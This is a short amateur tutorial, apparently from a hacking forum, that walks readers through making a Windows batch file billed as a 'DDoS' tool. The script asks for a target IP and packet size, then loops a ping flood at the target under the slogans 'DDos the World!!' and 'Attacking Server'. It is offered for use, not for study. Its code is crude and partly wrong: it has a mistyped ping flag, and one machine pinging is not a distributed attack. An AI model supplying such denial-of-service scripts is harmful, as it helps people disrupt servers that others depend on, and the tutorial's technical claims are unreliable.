Often hacking stuff from the internet is infacted, so you should build up your stuff yourself. It isnt much work and often easier if you think
# Open a new txt document. If you use Win7 open a RTF document.
# Change the ending to .bat , thats really important cause you want to have a dos appilcation and not a text document
# right click on the .bat file and click on edit.
[ If you choose the RTF File, please delete the first line ]
# now copy the following or type it
@echo off title DDos echo. echo DDos the World!! echo. echo Host IP echo. set /p m=Host: echo. set /p n=Packet Size: echo. :A echo Attacking Server %m% ping %m% -1 %n% -t >nul goto A
Feel free to change the green words. The titel is just the name of the application, so give it a name. The first echo is just a slogan which appears if you start the application. Type in what you want.
So you see its really simple and it takes 1 minute. Enjoy your own Doser.